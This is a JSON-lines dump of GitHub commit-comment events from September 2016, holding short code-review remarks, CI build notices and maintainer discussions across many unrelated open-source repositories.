{"id":"4547567102","type":"CommitCommentEvent","actor":{"login":"mcrae1"},"repo":{"name":"3dshax/ctr"},"payload":{"comment":{"id":18980314,"position":null,"line":null,"path":null,"commit_id":"bcb3734b9a26d0fe7ef66f7d3814406fee797303","created_at":"2016-09-12T06:32:55Z","updated_at":"2016-09-12T06:32:55Z","body":"Well put the date and time on Nintendo 3DS.\n\n2016-09-12 0:54 GMT+02:00 yakesiita <notifications@github.com>:\n\n> The master keys you send me are incorrect\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/3dshax/ctr/commit/bcb3734b9a26d0fe7ef66f7d3814406fee797303#commitcomment-18978485>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AT9LYW4XwcHYaE88kVa1MMIPwf3GoTXrks5qpIa-gaJpZM4CClL1>\n> .\n>\n"}},"created_at":"2016-09-12T06:32:55Z"}
{"id":"4547567527","type":"CommitCommentEvent","actor":{"login":"makizonokenji"},"repo":{"name":"ito-artsfarm/itoartsfarm2016-wp"},"payload":{"comment":{"id":18980315,"position":null,"line":null,"path":null,"commit_id":"705e9540d260cfcd9545bbbfb043f0e68459ae21","created_at":"2016-09-12T06:33:07Z","updated_at":"2016-09-12T06:33:07Z","body":"早速ありがとうございます！\r\nレイアウトですが、部分的に空白ができているようです。。\r\n僕のコードの書き方に問題あるのかもしれません、、\r\n\r\n<img width=\"871\" alt=\"2016-09-12 15 30 19\" src=\"https://cloud.githubusercontent.com/assets/15064449/18426616/eab79ef6-78fd-11e6-9b77-83638e166f6b.png\">\r\n"}},"created_at":"2016-09-12T06:33:07Z"}
{"id":"4547569202","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18980319,"position":null,"line":null,"path":null,"commit_id":"c88bd16f8637ba00e5f0350d3d0e533310586916","created_at":"2016-09-12T06:33:43Z","updated_at":"2016-09-12T06:33:43Z","body":"「引き込む」を直訳してDrawを使用していました。（「ずっと俺のターン」でも何かを引き抜いてましたし・・・）\r\n口頭でご指摘頂いた通り、sphinx内で使用している単語を利用しincludeに修正します。\r\n\r\n```\r\nsource: Include the source files of Ryu\r\n    \r\nThis patch adds file that can include the source files of Ryu.\r\nAlso, add build procedure to README.md.\r\n```"}},"created_at":"2016-09-12T06:33:43Z"}
{"id":"4547570190","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18980321,"position":null,"line":null,"path":null,"commit_id":"8a9b6748ccf0c5aa2f614b582239647b84efc28f","created_at":"2016-09-12T06:34:06Z","updated_at":"2016-09-12T06:34:06Z","body":"Puedes poner una prueba en https://1.11.chamilo.org ? "}},"created_at":"2016-09-12T06:34:06Z"}
{"id":"4547575677","type":"CommitCommentEvent","actor":{"login":"Xottab-DUTY"},"repo":{"name":"OpenXRay/xray-16"},"payload":{"comment":{"id":18980331,"position":null,"line":null,"path":null,"commit_id":"32005e8e253ff084469ca19e405de2b2a35c4c90","created_at":"2016-09-12T06:36:03Z","updated_at":"2016-09-12T06:36:03Z","body":"There's other commits, that we need to indicate, but I don't know who will do that)"}},"created_at":"2016-09-12T06:36:03Z"}
{"id":"4547579353","type":"CommitCommentEvent","actor":{"login":"ranisalt"},"repo":{"name":"eownis/node-argon2"},"payload":{"comment":{"id":18980343,"position":null,"line":null,"path":null,"commit_id":"ebb51c7890bdafc3d8e44b2f7fd8c900ad73daea","created_at":"2016-09-12T06:37:26Z","updated_at":"2016-09-12T06:37:26Z","body":"Could you PR it?"}},"created_at":"2016-09-12T06:37:26Z"}
{"id":"4547582574","type":"CommitCommentEvent","actor":{"login":"vala"},"repo":{"name":"rails-stall/stall"},"payload":{"comment":{"id":18980349,"position":8,"line":48,"path":"app/models/stall/models/product_list.rb","commit_id":"c9853ccbd6e52761ee6f53015040624a6bb96d73","created_at":"2016-09-12T06:38:36Z","updated_at":"2016-09-12T06:38:36Z","body":"this didn't do anything at all, fixed in 16d7974"}},"created_at":"2016-09-12T06:38:36Z"}
{"id":"4547583094","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18980354,"position":null,"line":null,"path":null,"commit_id":"3fcf9c8bc1208dbeec930f948eb5b86cbb705367","created_at":"2016-09-12T06:38:49Z","updated_at":"2016-09-12T06:38:49Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 231](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1187&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T06:38:49Z"}
{"id":"4547584493","type":"CommitCommentEvent","actor":{"login":"Orthodyne-mve"},"repo":{"name":"Orthodyne-mve/osTicket-1.8"},"payload":{"comment":{"id":18980358,"position":null,"line":null,"path":null,"commit_id":"8df821de2aaeeeb51c9f1f2ec19770b71e82620f","created_at":"2016-09-12T06:39:21Z","updated_at":"2016-09-12T06:39:21Z","body":"Glad it could help someone else. I actually struggled a while this one... I don't know why they didn't put it in the last releases..."}},"created_at":"2016-09-12T06:39:21Z"}
{"id":"4547585962","type":"CommitCommentEvent","actor":{"login":"ranisalt"},"repo":{"name":"jdconley/node-argon2"},"payload":{"comment":{"id":18980362,"position":null,"line":null,"path":null,"commit_id":"6ad01da1e68c45efa6f72af888ce06dfad4cc91d","created_at":"2016-09-12T06:39:56Z","updated_at":"2016-09-12T06:39:56Z","body":"C++11 is necessarily the default for Node >= 4 so that is redundant ([you can see here](https://github.com/nodejs/node/blob/f9f837885343a2a3f5ba2b8c510eaac395c8c865/common.gypi#L226) for Node 4.0)"}},"created_at":"2016-09-12T06:39:56Z"}
{"id":"4547585980","type":"CommitCommentEvent","actor":{"login":"blinoff82"},"repo":{"name":"nickdoherty81/android_manifest"},"payload":{"comment":{"id":18980363,"position":null,"line":null,"path":null,"commit_id":"241f375955f237a19c7c86d6648c97441a3efa09","created_at":"2016-09-12T06:39:56Z","updated_at":"2016-09-12T06:39:56Z","body":"lol)"}},"created_at":"2016-09-12T06:39:56Z"}
{"id":"4547586205","type":"CommitCommentEvent","actor":{"login":"Adversities"},"repo":{"name":"Tangerinos/Tanji"},"payload":{"comment":{"id":18980364,"position":null,"line":null,"path":null,"commit_id":"d77898b599e9247318875f335da50c3b4e7cd817","created_at":"2016-09-12T06:40:01Z","updated_at":"2016-09-12T06:40:01Z","body":"Oh lol, i remember that i told you something about \"Tanji already does it [GetBytes()]\", just add the value skipper it's usefull and tanji doesn't have it."}},"created_at":"2016-09-12T06:40:01Z"}
{"id":"4547589117","type":"CommitCommentEvent","actor":{"login":"Undre4m"},"repo":{"name":"Undre4m/puma"},"payload":{"comment":{"id":18980371,"position":null,"line":null,"path":null,"commit_id":"98d3d29a920446be1880c703a2217cdae7664c6e","created_at":"2016-09-12T06:41:02Z","updated_at":"2016-09-12T06:41:02Z","body":"NOTE:      Prior to ECMAScript 2015, RegExp instances were specified as having the own data properties \r\n                source, global, ignoreCase, and multiline. Those properties are now specified as accessor \r\n                properties of RegExp.prototype."}},"created_at":"2016-09-12T06:41:02Z"}
{"id":"4547592453","type":"CommitCommentEvent","actor":{"login":"hepin1989"},"repo":{"name":"monixio/monix"},"payload":{"comment":{"id":18980378,"position":null,"line":null,"path":null,"commit_id":"5298c5ef147fdbe394ac8550d2e24af06eb630b9","created_at":"2016-09-12T06:42:12Z","updated_at":"2016-09-12T06:42:12Z","body":"At Cat's website ,it's `Asynchronous` :)."}},"created_at":"2016-09-12T06:42:12Z"}
{"id":"4547598758","type":"CommitCommentEvent","actor":{"login":"Crunchyroll1"},"repo":{"name":"neetVeritas/pye-module"},"payload":{"comment":{"id":18980388,"position":null,"line":null,"path":null,"commit_id":"0d64c4778e89a6519d6afd172827fa6c607e9ddf","created_at":"2016-09-12T06:44:24Z","updated_at":"2016-09-12T06:44:24Z","body":"i found what i was looking for\r\nlmpAddy = scan->findPattern( dwBegin, dwEnd, (PBYTE)\"\\xFF\\x15\\x34\\x00\\x6E\\x00\\x6A\\x00\", \"xxx?xxxx\" );\r\ni looked through the code of memory.h, memory.cpp, scanner.h in your tye source. thanks anyways. i can just convert the 192 value to array of bytes and make it scan for that instead.\r\n\r\nalso, are u planning on releasing any hacks for rf still? any progress on neetgroup?"}},"created_at":"2016-09-12T06:44:24Z"}
{"id":"4547604832","type":"CommitCommentEvent","actor":{"login":"CarterLi"},"repo":{"name":"ElemeFE/style-guide"},"payload":{"comment":{"id":18980396,"position":null,"line":null,"path":null,"commit_id":"32e6344de26dd914053858c2be6a62e879ce9ee9","created_at":"2016-09-12T06:46:31Z","updated_at":"2016-09-12T06:46:31Z","body":"Typo?"}},"created_at":"2016-09-12T06:46:31Z"}
{"id":"4547606511","type":"CommitCommentEvent","actor":{"login":"lp--"},"repo":{"name":"syzygy1/Stockfish"},"payload":{"comment":{"id":18980403,"position":null,"line":null,"path":null,"commit_id":"c95b70b855888b9fed745f5d3b657b0b2eb1426b","created_at":"2016-09-12T06:47:07Z","updated_at":"2016-09-12T06:47:07Z","body":"@mcostalba:  It is exactly the same"}},"created_at":"2016-09-12T06:47:07Z"}
{"id":"4547609730","type":"CommitCommentEvent","actor":{"login":"dequis"},"repo":{"name":"dequis/test"},"payload":{"comment":{"id":18980422,"position":null,"line":null,"path":null,"commit_id":"18042e22708755e6e42cb0bbba8b800ef4d18e2d","created_at":"2016-09-12T06:48:15Z","updated_at":"2016-09-12T06:48:15Z","body":"testsetset"}},"created_at":"2016-09-12T06:48:15Z"}
{"id":"4547611718","type":"CommitCommentEvent","actor":{"login":"sudocrystal"},"repo":{"name":"Ada-Developers-Academy/textbook-curriculum"},"payload":{"comment":{"id":18980430,"position":null,"line":null,"path":null,"commit_id":"4af2a4c91566110568dbfdbae738b501325f430c","created_at":"2016-09-12T06:48:56Z","updated_at":"2016-09-12T06:48:56Z","body":"@PilgrimMemoirs shoot - I accidentally did this straight on master :( sorry"}},"created_at":"2016-09-12T06:48:56Z"}
{"id":"4547612961","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18980431,"position":null,"line":null,"path":null,"commit_id":"1eeaf396b9ca68a3e9def13409a3445be15c54e3","created_at":"2016-09-12T06:49:25Z","updated_at":"2016-09-12T06:49:25Z","body":"Ryuファイルの引き込みを他のパッチで行っていますので\r\n・今後はRyuのソースファイルを引き込むようになった\r\n・それによってRyu-book上のファイルは不要となった\r\n・このパッチで不要なファイルを削除\r\n\r\nという流れで記載していました。\r\n\r\n上記ほど細かく記載する必要もないと思いますので、以下の内容に修正します。\r\n```\r\nsource: Delete some application files\r\n\r\nThis patch deletes some application files for included a file from Ryu.\r\n\r\n```\r\n"}},"created_at":"2016-09-12T06:49:25Z"}
{"id":"4547613285","type":"CommitCommentEvent","actor":{"login":"dbarrosop"},"repo":{"name":"napalm-automation/napalm-ios"},"payload":{"comment":{"id":18980433,"position":13,"line":14,"path":"setup.py","commit_id":"993d0d7d10401d204efe3c24ff0236421e506af3","created_at":"2016-09-12T06:49:32Z","updated_at":"2016-09-12T06:49:32Z","body":"can we move this to `napalm-base` so we can reuse it everywhere?"}},"created_at":"2016-09-12T06:49:32Z"}
{"id":"4547614376","type":"CommitCommentEvent","actor":{"login":"NikitaMeshcaninov"},"repo":{"name":"Shmublon/erilon_tests"},"payload":{"comment":{"id":18980437,"position":60,"line":124,"path":"src/test/java/GameGnomClassTest.java","commit_id":"f1c7eab4b5a30051083edd15d646dff7af9fe4b9","created_at":"2016-09-12T06:49:54Z","updated_at":"2016-09-12T06:49:54Z","body":"Тут висит 30 сек"}},"created_at":"2016-09-12T06:49:54Z"}
{"id":"4547614733","type":"CommitCommentEvent","actor":{"login":"dbarrosop"},"repo":{"name":"napalm-automation/napalm-ios"},"payload":{"comment":{"id":18980440,"position":4,"line":17,"path":"napalm_ios/__init__.py","commit_id":"993d0d7d10401d204efe3c24ff0236421e506af3","created_at":"2016-09-12T06:50:02Z","updated_at":"2016-09-12T06:50:02Z","body":"Makes complete sense, will create issues on all the repos to track this."}},"created_at":"2016-09-12T06:50:02Z"}
{"id":"4547617718","type":"CommitCommentEvent","actor":{"login":"xiongtx"},"repo":{"name":"emacs-helm/helm"},"payload":{"comment":{"id":18980445,"position":16,"line":114,"path":"helm-org.el","commit_id":"20475c72b05a010a8dfcf289723583dcd5cbd822","created_at":"2016-09-12T06:51:00Z","updated_at":"2016-09-12T06:51:00Z","body":"`C-c w` would be consistent with the bindings for most Helm actions."}},"created_at":"2016-09-12T06:51:00Z"}
{"id":"4547625591","type":"CommitCommentEvent","actor":{"login":"vandomej"},"repo":{"name":"vandomej/Balance_Manager"},"payload":{"comment":{"id":18980458,"position":null,"line":null,"path":null,"commit_id":"7fc949f40c63a9b848b5d100fff9cac1ce547a74","created_at":"2016-09-12T06:53:37Z","updated_at":"2016-09-12T06:53:37Z","body":"Associated with issue #4 "}},"created_at":"2016-09-12T06:53:37Z"}
{"id":"4547630471","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18980467,"position":95,"line":162,"path":"tests/protractor/e2e/send-message.js","commit_id":"4c263585808e8bde97e5264ecacd6de2bd6677e9","created_at":"2016-09-12T06:55:14Z","updated_at":"2016-09-12T06:55:14Z","body":"We could rework it so we're passing a matching function in instead of a selecter and string. That function could then do stuff like look for icons and what-not, but IMO it's just as flaky. Which is to say, not actually flaky at all (the text isn't going to sometimes be there and sometimes not), it's just if we change the english translation we'd have to change the test. Which IDK, I'm not that worried about."}},"created_at":"2016-09-12T06:55:14Z"}
{"id":"4547631386","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"syzygy1/Stockfish"},"payload":{"comment":{"id":18980468,"position":null,"line":null,"path":null,"commit_id":"c95b70b855888b9fed745f5d3b657b0b2eb1426b","created_at":"2016-09-12T06:55:32Z","updated_at":"2016-09-12T06:55:32Z","body":"@lp-- sorry but I am very dumb. Please be so kind, help a dumb guy and just flip master with base.\r\n\r\nGuys it's not easy, everybody wants everything....please!\r\n"}},"created_at":"2016-09-12T06:55:32Z"}
{"id":"4547632396","type":"CommitCommentEvent","actor":{"login":"user1234567891011"},"repo":{"name":"user1234567891011/ruTorrent"},"payload":{"comment":{"id":18980471,"position":null,"line":null,"path":null,"commit_id":"418ebef8b97a10a2d8817202abdcfa4aaa52be74","created_at":"2016-09-12T06:55:48Z","updated_at":"2016-09-12T06:55:48Z","body":"Changes height of the Settings window to allow Limited1,2 and 3 to be displayed at the same time under scheduler tab"}},"created_at":"2016-09-12T06:55:48Z"}
{"id":"4547633850","type":"CommitCommentEvent","actor":{"login":"sergio-teruel"},"repo":{"name":"OCA/connector-prestashop"},"payload":{"comment":{"id":18980473,"position":13,"line":50,"path":"connector_prestashop_catalog_manager/product.py","commit_id":"cf9e7d971a9b4c23884843429bfd0526c55427b8","created_at":"2016-09-12T06:56:19Z","updated_at":"2016-09-12T06:56:19Z","body":"because delay_export method of consumer module already has  this check condition so here is not necessary."}},"created_at":"2016-09-12T06:56:19Z"}
{"id":"4547633914","type":"CommitCommentEvent","actor":{"login":"svenefftinge"},"repo":{"name":"eclipse/xtext-extras"},"payload":{"comment":{"id":18980474,"position":89,"line":89,"path":"org.eclipse.xtext.common.types/src/org/eclipse/xtext/common/types/access/impl/InnerClassNameVariants.java","commit_id":"c19835864af4744f8d6531e8d7f6a4b11983681f","created_at":"2016-09-12T06:56:21Z","updated_at":"2016-09-12T06:56:21Z","body":"like this one better (more understandable and lazier)"}},"created_at":"2016-09-12T06:56:21Z"}
{"id":"4547635312","type":"CommitCommentEvent","actor":{"login":"sergio-teruel"},"repo":{"name":"OCA/connector-prestashop"},"payload":{"comment":{"id":18980479,"position":27,"line":56,"path":"connector_prestashop_catalog_manager/wizard/export_multiple_products_view.xml","commit_id":"cf9e7d971a9b4c23884843429bfd0526c55427b8","created_at":"2016-09-12T06:56:52Z","updated_at":"2016-09-12T06:56:52Z","body":"Oks.. I forgot remove this.."}},"created_at":"2016-09-12T06:56:52Z"}
{"id":"4547635948","type":"CommitCommentEvent","actor":{"login":"kenchris"},"repo":{"name":"w3c/manifest"},"payload":{"comment":{"id":18980483,"position":null,"line":null,"path":null,"commit_id":"dddeb972c7cf6792fd89dea443a3c9f7a3cb64ac","created_at":"2016-09-12T06:57:06Z","updated_at":"2016-09-12T06:57:06Z","body":"lgtm"}},"created_at":"2016-09-12T06:57:06Z"}
{"id":"4547636416","type":"CommitCommentEvent","actor":{"login":"svenefftinge"},"repo":{"name":"eclipse/xtext-extras"},"payload":{"comment":{"id":18980485,"position":104,"line":104,"path":"org.eclipse.xtext.common.types/src/org/eclipse/xtext/common/types/access/impl/InnerClassNameVariants.java","commit_id":"c19835864af4744f8d6531e8d7f6a4b11983681f","created_at":"2016-09-12T06:57:14Z","updated_at":"2016-09-12T06:57:14Z","body":"I think Integer.toBinaryString does this, too. The outcome would be a string (char[]), though."}},"created_at":"2016-09-12T06:57:14Z"}
{"id":"4547636656","type":"CommitCommentEvent","actor":{"login":"phdm"},"repo":{"name":"Freescale/libimxvpuapi"},"payload":{"comment":{"id":18980486,"position":null,"line":null,"path":null,"commit_id":"ddbd99ef6404b73811568b2cac4ccae45804b87a","created_at":"2016-09-12T06:57:19Z","updated_at":"2016-09-12T06:57:19Z","body":"Hi Carlos,\r\n\r\nIn my implementation I allocated only one fake dummy_cbcr_size-sized plane, serving as cb_plane and as cr_plane for all frames.\r\nIf I understand your implementation correctly, you allocate a fake plane with size 3*dummy_cbcr_size for each frame, thus using 3 * num_framebuffers more memory than in my implementation.  Is there any compelling reason for doing that ?"}},"created_at":"2016-09-12T06:57:19Z"}
{"id":"4547638028","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/connector-prestashop"},"payload":{"comment":{"id":18980488,"position":13,"line":50,"path":"connector_prestashop_catalog_manager/product.py","commit_id":"cf9e7d971a9b4c23884843429bfd0526c55427b8","created_at":"2016-09-12T06:57:46Z","updated_at":"2016-09-12T06:57:46Z","body":"OK"}},"created_at":"2016-09-12T06:57:46Z"}
{"id":"4547638379","type":"CommitCommentEvent","actor":{"login":"voisardf"},"repo":{"name":"sbrunner/crdppf"},"payload":{"comment":{"id":18980489,"position":null,"line":null,"path":null,"commit_id":"18c71456dae8b936c7456973088d0da28a44361f","created_at":"2016-09-12T06:57:54Z","updated_at":"2016-09-12T06:57:54Z","body":"Thanks a lot, that seems to do the trick! :)\r\n"}},"created_at":"2016-09-12T06:57:54Z"}
{"id":"4547639079","type":"CommitCommentEvent","actor":{"login":"Kreyo"},"repo":{"name":"CirnoNineball/whatever"},"payload":{"comment":{"id":18980490,"position":null,"line":null,"path":null,"commit_id":"cd837999580ba64bf5d61df94cfb3b5191dfa162","created_at":"2016-09-12T06:58:08Z","updated_at":"2016-09-12T06:58:08Z","body":"1) You might want to fix the color of the very top menu - it seems a bit incorrect right now.\r\n2) Try adding href=\"#\" to links, so that they would be clickable.\r\n3) Nice try with the padding - however, I think in this case you might want to use position:absolute and z-index parameter ."}},"created_at":"2016-09-12T06:58:08Z"}
{"id":"4547641404","type":"CommitCommentEvent","actor":{"login":"judsona"},"repo":{"name":"judsona/flyway-ingres"},"payload":{"comment":{"id":18980493,"position":11,"line":88,"path":"pom.xml","commit_id":"75917d799cf371561ea55fce8ccaabdc93c3e499","created_at":"2016-09-12T06:58:54Z","updated_at":"2016-09-12T06:58:54Z","body":"This might need to be reverted or changed if merged back into official code base (this is only needed for works networking :])"}},"created_at":"2016-09-12T06:58:54Z"}
{"id":"4547644407","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18980503,"position":null,"line":null,"path":null,"commit_id":"7cfc5b4b608c8b5a4694df021b4517974e71b1a4","created_at":"2016-09-12T06:59:54Z","updated_at":"2016-09-12T06:59:54Z","body":"So it was a bug or?"}},"created_at":"2016-09-12T06:59:54Z"}
{"id":"4547645093","type":"CommitCommentEvent","actor":{"login":"FastGeert"},"repo":{"name":"jumpscale7/jumpscale_core7"},"payload":{"comment":{"id":18980504,"position":7,"line":7,"path":"lib/JumpScale/lib/openvstorage/openvstorage.py","commit_id":"81a26232abb7ace88ce97f1ed3cc694febc2b700","created_at":"2016-09-12T07:00:10Z","updated_at":"2016-09-12T07:00:10Z","body":"I think the get method should be static"}},"created_at":"2016-09-12T07:00:10Z"}
{"id":"4547648516","type":"CommitCommentEvent","actor":{"login":"mgedmin"},"repo":{"name":"github/hub"},"payload":{"comment":{"id":18980526,"position":79,"line":79,"path":"vendor/github.com/howeyc/gopass/pass.go","commit_id":"70d7bb66d54c922ef7bdfe59bb26283b7cb8a365","created_at":"2016-09-12T07:01:13Z","updated_at":"2016-09-12T07:01:13Z","body":"https://github.com/howeyc/gopass/issues/32"}},"created_at":"2016-09-12T07:01:13Z"}
{"id":"4547648875","type":"CommitCommentEvent","actor":{"login":"Alhadis"},"repo":{"name":"mmims/language-batchfile"},"payload":{"comment":{"id":18980529,"position":null,"line":null,"path":null,"commit_id":"100b682992acf511ab330de2c54b8c42493964e4","created_at":"2016-09-12T07:01:19Z","updated_at":"2016-09-12T07:01:19Z","body":"Congrats, this grammar is [now being used](https://github.com/github/linguist/issues/3189) to supply Batchfile highlighting on GitHub. =)\r\n\r\n(E.g., don't go deleting this or anything, haha)"}},"created_at":"2016-09-12T07:01:19Z"}
{"id":"4547651006","type":"CommitCommentEvent","actor":{"login":"ErikSchierboom"},"repo":{"name":"exercism/x-api"},"payload":{"comment":{"id":18980535,"position":null,"line":null,"path":null,"commit_id":"41a3d356c98fa474f91bc45d320f222854683558","created_at":"2016-09-12T07:01:58Z","updated_at":"2016-09-12T07:01:58Z","body":"@kytrinyx @ramyaravindranath With this commit merged, can language tracks that already use the new `exercises` key in their `config.json` file drop the old `problem` key?"}},"created_at":"2016-09-12T07:01:58Z"}
{"id":"4547655945","type":"CommitCommentEvent","actor":{"login":"smoogipooo"},"repo":{"name":"ppy/osu-framework"},"payload":{"comment":{"id":18980546,"position":31,"line":391,"path":"osu.Framework/Graphics/OpenGL/GLWrapper.cs","commit_id":"601eb5dd3ca510da9d8fe1f2905358a4f68286db","created_at":"2016-09-12T07:03:25Z","updated_at":"2016-09-12T07:03:25Z","body":"Just for safety purposes, I'd reset CurrentShader to null in reset(). Is CurrentShader a recent addition?"}},"created_at":"2016-09-12T07:03:25Z"}
{"id":"4547657224","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"syzygy1/Stockfish"},"payload":{"comment":{"id":18980553,"position":null,"line":null,"path":null,"commit_id":"c95b70b855888b9fed745f5d3b657b0b2eb1426b","created_at":"2016-09-12T07:03:50Z","updated_at":"2016-09-12T07:03:50Z","body":"@lp-- not everybody is a statistics wizard, not everybody understands what SPRT is, but many people in our community knows that SPRT[0, 5] is \"hard\" and for normal patches and SPRT[-3, 1] is \"easier\" for simplifications, so reading the test page they understand what is going on.\r\n\r\nInstead if you introduce another set of SPRT parameters out of the blue you just make people don't understand what's going on anymore. So just changing SPRT parameters because you (and a very small number of expert) know that is equivalent is a poor choice because do not take in consideration that the most part of us simply will not understand. Instead flipping the branches everybody understand.\r\n"}},"created_at":"2016-09-12T07:03:50Z"}
{"id":"4547660411","type":"CommitCommentEvent","actor":{"login":"AMartinNo1"},"repo":{"name":"OXID-eSales/oxideshop_ce"},"payload":{"comment":{"id":18980566,"position":null,"line":null,"path":null,"commit_id":"08bbffecb5b1df20fb29d51acd9dc5336ff33bf7","created_at":"2016-09-12T07:04:46Z","updated_at":"2016-09-12T07:04:46Z","body":"Does it makes sense not to exclude the generated picture directory?"}},"created_at":"2016-09-12T07:04:46Z"}
{"id":"4547661284","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18980569,"position":null,"line":null,"path":null,"commit_id":"3fcf9c8bc1208dbeec930f948eb5b86cbb705367","created_at":"2016-09-12T07:05:02Z","updated_at":"2016-09-12T07:05:02Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 231](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1187&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:26:13"}},"created_at":"2016-09-12T07:05:02Z"}
{"id":"4547661308","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18980570,"position":null,"line":null,"path":null,"commit_id":"5937e67982e9cf06fe7e63344aacdec5b58bf708","created_at":"2016-09-12T07:05:03Z","updated_at":"2016-09-12T07:05:03Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 232](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1188&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T07:05:03Z"}
{"id":"4547662505","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18980572,"position":30,"line":25,"path":"plugins/VersionUpgrade/VersionUpgrade21to22/VersionUpgrade21to22.py","commit_id":"852a7d20bc5f0adf17f9c3da32c79474411304ac","created_at":"2016-09-12T07:05:23Z","updated_at":"2016-09-12T07:05:23Z","body":"Do we have a python configfile object (representing the file)? That object should then have all the properties from the cfg file. Maybe the configfile object can even read and write multiple versions of the config file."}},"created_at":"2016-09-12T07:05:23Z"}
{"id":"4547664921","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"jaels/kitty-carousel"},"payload":{"comment":{"id":18980580,"position":64,"line":52,"path":"kitty.js","commit_id":"5ea8efece2cb36d7f597f24c4255b673f04f55ab","created_at":"2016-09-12T07:06:04Z","updated_at":"2016-09-12T07:06:04Z","body":"The way these click handlers are added to the dots is rather repetitive. I bet there's a way to do this without so much repetition."}},"created_at":"2016-09-12T07:06:04Z"}
{"id":"4547666668","type":"CommitCommentEvent","actor":{"login":"cdietrich"},"repo":{"name":"eclipse/xtext-extras"},"payload":{"comment":{"id":18980596,"position":104,"line":104,"path":"org.eclipse.xtext.common.types/src/org/eclipse/xtext/common/types/access/impl/InnerClassNameVariants.java","commit_id":"c19835864af4744f8d6531e8d7f6a4b11983681f","created_at":"2016-09-12T07:06:35Z","updated_at":"2016-09-12T07:06:35Z","body":"yes but it has no base length, thus i would have to leftpad it "}},"created_at":"2016-09-12T07:06:35Z"}
{"id":"4547669302","type":"CommitCommentEvent","actor":{"login":"smoogipooo"},"repo":{"name":"ppy/osu-framework"},"payload":{"comment":{"id":18980605,"position":null,"line":null,"path":null,"commit_id":"7086ec037b0a0c279f5974310faf73751041672c","created_at":"2016-09-12T07:07:22Z","updated_at":"2016-09-12T07:07:22Z","body":"Why?"}},"created_at":"2016-09-12T07:07:22Z"}
{"id":"4547670545","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"jaels/kitty-carousel"},"payload":{"comment":{"id":18980608,"position":186,"line":161,"path":"kitty.js","commit_id":"5ea8efece2cb36d7f597f24c4255b673f04f55ab","created_at":"2016-09-12T07:07:46Z","updated_at":"2016-09-12T07:07:46Z","body":"Rather than using a second timeout it would be better to use the transitionend event to know when the transition is really over."}},"created_at":"2016-09-12T07:07:46Z"}
{"id":"4547674149","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"jaels/kitty-carousel"},"payload":{"comment":{"id":18980612,"position":188,"line":163,"path":"kitty.js","commit_id":"5ea8efece2cb36d7f597f24c4255b673f04f55ab","created_at":"2016-09-12T07:08:51Z","updated_at":"2016-09-12T07:08:51Z","body":"Since the images are supposed to fill the browser no matter how wide it is, how can we hardcode values in px units and know that they are correct?"}},"created_at":"2016-09-12T07:08:51Z"}
{"id":"4547675665","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18980616,"position":null,"line":null,"path":null,"commit_id":"7f4602b5074126fa6a5e4e029f67a94a88eae695","created_at":"2016-09-12T07:09:18Z","updated_at":"2016-09-12T07:09:18Z","body":"Related to: backdrop/backdrop-issues#2077 "}},"created_at":"2016-09-12T07:09:18Z"}
{"id":"4547675903","type":"CommitCommentEvent","actor":{"login":"ddurieux"},"repo":{"name":"Alignak-monitoring-contrib/alignak-module-backend"},"payload":{"comment":{"id":18980617,"position":5,"line":35,"path":"alignak_module_backend/scheduler/module.py","commit_id":"414081335de6210c3adf11eba5686fe48f16f2b7","created_at":"2016-09-12T07:09:22Z","updated_at":"2016-09-12T07:09:22Z","body":"It's _backend_scheduler_ instead _backends_scheduler_ no?"}},"created_at":"2016-09-12T07:09:22Z"}
{"id":"4547680604","type":"CommitCommentEvent","actor":{"login":"torkelo"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":18980625,"position":null,"line":null,"path":null,"commit_id":"4edb31723c0338d3a0829e9622320ce41b732be9","created_at":"2016-09-12T07:10:43Z","updated_at":"2016-09-12T07:10:43Z","body":"why ignore them? "}},"created_at":"2016-09-12T07:10:43Z"}
